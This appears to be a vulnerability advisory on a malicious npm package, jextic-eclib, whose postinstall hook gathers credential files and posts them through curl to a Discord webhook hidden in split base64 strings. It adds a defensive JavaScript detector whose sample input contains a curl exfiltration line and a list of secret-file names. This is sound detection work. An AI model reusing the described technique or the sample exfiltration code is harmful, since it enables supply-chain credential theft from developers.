Vulnerability
Malicious code in jextic-eclib (npm)
## Source: amazon-inspector (13a6476409b9cb9296b7f778be375081c8ad12b030658351092e9fef90f4b707)

On `npm install`, the package's postinstall hook (`postinstall.js`) requires `index.js`, whose top-level `scanAndExfiltrate()` call walks the installer's working directory and its parent directories for sensitive files (`.env`, `.aws/credentials`, `.ssh/id_rsa`, `.npmrc`, `.netrc`, `.git-credentials`, `service-account.json`, and similar) and POSTs their contents via `execSync('curl ...')` to a hardcoded Discord webhook. The webhook URL is split into two base64-encoded chunks (`aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3Mv` plus a base64-encoded webhook ID/token) and reassembled at runtime to evade simple string scanners. The combination of installer-secret enumeration, a hardcoded attacker-controlled exfiltration endpoint, base64 obfuscation, and unconditional execution under the postinstall lifecycle hook is a textbook supply-chain credential-theft attack.
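A static triage check for the pattern this record describes (an install lifecycle hook, base64 string literals that reassemble into a URL, a `curl` shell-out, and secret-file names), added here as an example and not code from the package or from Amazon Inspector. The prefix literal is the one quoted above; the ID/token chunk and the sample `package.json` and hook source are constructed placeholders.

```javascript
// Added example: flag an npm package whose install hook hides an exfil URL in split base64 literals.
// Sample inputs are constructed; nothing here is the package's own code.
const B64_LITERAL = /(['"`])([A-Za-z0-9+/]{16,}={0,2})\1/g;

// Decode every base64-looking string literal and keep those that decode to printable ASCII.
function decodeB64Literals(source) {
  const out = [];
  for (const m of source.matchAll(B64_LITERAL)) {
    const text = Buffer.from(m[2], 'base64').toString('utf8');
    if (/^[\x20-\x7e]+$/.test(text)) out.push({ literal: m[2], text });
  }
  return out;
}

// Report URLs that appear in a decoded fragment alone or in the fragments concatenated in source order
// (the concatenation is what catches the "prefix chunk + id/token chunk" split).
function findHiddenUrls(source) {
  const parts = decodeB64Literals(source).map(p => p.text);
  const urls = new Set();
  for (const t of [...parts, parts.join('')]) {
    const m = t.match(/https?:\/\/[^\s'"`]+/);
    if (m) urls.add(m[0]);
  }
  return [...urls];
}

// Combine the install-hook check with the source-string checks into one verdict.
function triagePackage(pkgJson, hookSource) {
  const scripts = pkgJson.scripts || {};
  const hook = ['preinstall', 'install', 'postinstall'].find(k => k in scripts) || null;
  const urls = findHiddenUrls(hookSource);
  const shellsOut = /execSync\s*\(\s*['"`]\s*curl/.test(hookSource);
  const secretPaths = [...new Set(hookSource.match(/\.env|\.npmrc|\.netrc|id_rsa|credentials/g) || [])];
  const suspicious = hook !== null && (urls.length > 0 || shellsOut) && secretPaths.length > 0;
  return { hook, urls, shellsOut, secretPaths, suspicious };
}

// Constructed sample: the webhook ID/token is a placeholder, not a real value.
const SAMPLE_PKG = { name: 'demo-pkg', scripts: { postinstall: 'node postinstall.js' } };
const SAMPLE_SRC = [
  "const a = 'aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3Mv';",
  "const b = '" + Buffer.from('PLACEHOLDER_ID/PLACEHOLDER_TOKEN').toString('base64') + "';",
  "const url = Buffer.from(a, 'base64').toString() + Buffer.from(b, 'base64').toString();",
  "for (const f of ['.env', '.npmrc', '.ssh/id_rsa']) { /* read f */ }",
  "execSync(`curl -X POST -d @- ${url}`);",
].join('\n');

module.exports = { decodeB64Literals, findHiddenUrls, triagePackage, SAMPLE_PKG, SAMPLE_SRC };
```

Run the same functions over a benign package (no install hook, no decodable URL) to confirm `suspicious` stays false before wiring this into a pre-install check.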
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence